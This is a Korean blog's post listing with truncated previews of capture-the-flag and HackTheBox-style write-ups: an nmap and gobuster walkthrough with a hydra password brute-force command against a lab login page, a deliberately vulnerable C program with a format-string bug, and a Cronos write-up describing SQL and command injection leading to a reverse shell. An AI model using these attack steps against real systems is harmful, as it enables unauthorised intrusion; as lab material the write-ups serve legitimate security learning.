목록전체 글 (420)
외로운 Nova의 작업실
- 스캔 nmap -Pn -n -p- -sV -sC -v --min-rate 5000 --max-retries 4 10.10.10.43 -oA nmap 웹페이지를 방문해보겠습니다. 80포트부터 방문해보겠습니다. 고부스터로 어떤 디렉토리가 있는지 스캔해보겠습니다. department가 있네요. 들어가보겠습니다. 이제야 무엇인가 할게 보입니다. - 침투 sql 인젝션이 안통하니 히드라로 딕셔너리 공격을 해줍니다. hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -V 나옵니다. 로그인해주겠습..
- source code #include #include #include #include void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void get_shell() { system("/bin/sh"); } int main(int argc, char *argv[]) { char buf[0x80]; initialize(); read(0, buf, 0x80); printf(buf); exit(0); } - exploit code..
1. port scan result address port 10.10.10.13 22,80,53 2. initial access - sql injection Vulnerability Explanation : admin.cronos.htb web page do not verify input value. so i could inject the sql query, i access admin page. and also, admin.cronos.htb/welcome.php page do not verify input value. i could inject the command query. so, i geted reverse_shell Vulnerability Fix : always verify user's inp..